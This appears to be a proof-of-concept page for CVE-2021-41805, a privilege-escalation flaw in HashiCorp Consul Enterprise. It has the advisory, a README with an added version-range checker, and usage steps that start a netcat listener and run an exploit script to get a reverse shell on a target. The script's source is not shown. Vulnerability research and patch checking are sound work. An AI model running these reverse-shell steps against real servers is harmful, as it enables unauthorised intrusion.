
CVE-2021-41805 PoC: HashiCorp Consul security vulnerability

Associated Vulnerability
Title: HashiCorp Consul security vulnerability (CVE-2021-41805)
Description: HashiCorp Consul is a distributed, highly available, datacenter-aware solution from HashiCorp (United States). It is used to connect and configure applications across dynamic, distributed infrastructure. HashiCorp Consul Enterprise contains a security vulnerability that an attacker can exploit to escalate privileges. Affected products and versions: HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4.
Description
A proof-of-concept for CVE-2021-41805, a privilege-escalation vulnerability in HashiCorp Consul Enterprise that this script chains into Remote Code Execution (RCE).
Readme
# CVE-2021-41805 - HashiCorp Consul Enterprise RCE

> [!WARNING]
> LEGAL DISCLAIMER:
> This tool is STRICTLY for EDUCATIONAL PURPOSES ONLY!
> Usage of this tool for attacking targets without prior mutual consent is ILLEGAL.
> It is the user's responsibility to obey all laws that apply whilst using this tool.
> The developer of this tool assumes no liability and is not responsible for any misuse
> or damage caused by this program.

## About the CVE
An **ACL token** holding **operator:write** permissions in one namespace (the permission set the advisory describes as the default) can be used for unintended privilege escalation in a different namespace. This PoC abuses that escalation to obtain a reverse shell, i.e. **Remote Code Execution (RCE)**, with the escalated privileges; the token passed with `-t` is the one the script uses.

## Affected Versions
HashiCorp Consul Enterprise only, per the advisory:
- < 1.8.17
- 1.9.x < 1.9.11
- 1.10.x < 1.10.4
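
Before pointing the script at a host it helps to confirm the build is actually inside one of the three ranges above. The following is an added example and not code from this repository: a small Python check that encodes the advisory's version bounds and pulls the version string out of the JSON a Consul agent returns for `GET /v1/agent/self` (the `Config.Version` field). The sample response body is constructed, and the assumption that Enterprise builds are marked with a `+ent` suffix is mine rather than something the advisory states.

```python
"""Check whether a Consul build falls inside the CVE-2021-41805 affected ranges.

Added example, not part of the PoC repository. It only implements the version
ranges listed in the advisory; it does not probe or exploit anything.
"""
import json
import re
from typing import Optional, Tuple

# Ranges from the advisory: every Enterprise build before 1.8.17,
# 1.9.x before 1.9.11, and 1.10.x before 1.10.4.
FIXED = {
    (1, 9): (1, 9, 11),
    (1, 10): (1, 10, 4),
}
FIXED_BASE = (1, 8, 17)

# Accepts "1.10.3", "v1.10.3", "1.10.3+ent", "1.11.0-beta2" and similar.
VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:[-+]([0-9A-Za-z.\-]+))?$")


def parse_version(text: str) -> Tuple[Tuple[int, int, int], Optional[str]]:
    """Split 'v1.10.3+ent' into ((1, 10, 3), 'ent'); raise on anything else."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Consul version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))), m.group(4)


def is_enterprise(version: str) -> bool:
    """Assumption: Enterprise builds carry an 'ent' suffix (e.g. 1.10.3+ent)."""
    _, suffix = parse_version(version)
    if suffix is None:
        return False
    return suffix.split("-")[0].split(".")[0] == "ent"


def in_affected_range(version: str) -> bool:
    """Pure range check against the advisory's bounds; edition is ignored here."""
    (major, minor, patch), _ = parse_version(version)
    key = (major, minor)
    if key in FIXED:
        return (major, minor, patch) < FIXED[key]
    if key < (1, 9):
        # "before 1.8.17" covers every older minor as well (1.7.x, 1.6.x, ...).
        return (major, minor, patch) < FIXED_BASE
    return False  # 1.11 and later are outside every listed range


def is_affected(version: str) -> bool:
    """True only for Enterprise builds inside one of the affected ranges."""
    return is_enterprise(version) and in_affected_range(version)


def version_from_agent_self(body: str) -> str:
    """Extract Config.Version from a GET /v1/agent/self JSON body."""
    return json.loads(body)["Config"]["Version"]


# Constructed sample response body, trimmed to the field used here.
SAMPLE_AGENT_SELF = '{"Config": {"Datacenter": "dc1", "Version": "1.10.3+ent"}}'

if __name__ == "__main__":
    v = version_from_agent_self(SAMPLE_AGENT_SELF)
    print(f"{v}: affected={is_affected(v)}")
```

Feed `version_from_agent_self` the body of a real `curl http://<TARGET_IP>:<TARGET_PORT>/v1/agent/self` (with `-H "X-Consul-Token: ..."` if the agent requires it) to check a live target; an open-source build such as `1.10.3` without the suffix deliberately comes back as not affected.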

## Installing and Running the Script
- First, clone the repository:\
`git clone https://github.com/acfirthh/CVE-2021-41805.git`
- Change directory into the cloned repository:\
`cd CVE-2021-41805`
- Start a listener for the reverse shell on a host the target can reach:\
`nc -nvlp <LISTENER_PORT>`
- Run the script (`-t` supplies the ACL token with `operator:write`, `-s` sends the requests over SSL/TLS, `-v` prints each step):\
`python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]`

![Reverse Shell](images/reverse_shell.png)

## Expected Output
Running the exploit with the basic arguments **-r [TARGET_IP]**, **-rp [TARGET_PORT]**, **-l [LISTENER_IP]** and **-lp [LISTENER_PORT]** (optionally **-t [ACL_TOKEN]** and **-s** for SSL) gives minimal output like:\
```
[*] The PUT request was made successfully. Check your listener...
```

Running the exploit with the basic arguments plus **-v [VERBOSE]** will give verbose output:\
![Verbose Output](images/verbose_output.png)

If an error occurs when the exploit is run and the **-v** argument is specified, the output will be something like:\
![Verbose Output with Error](images/verbose_output_error.png)
File Snapshot

```
[4.0K] /data/pocs/e5578d88836796a02dbc2a0e093346110c1f9243
├── [2.8K] CVE-2021-41805.py
├── [4.0K] images
│   ├── [ 14K] reverse_shell.png
│   ├── [ 50K] verbose_output_error.png
│   └── [ 32K] verbose_output.png
├── [ 34K] LICENSE
└── [1.8K] README.md

1 directory, 6 files
```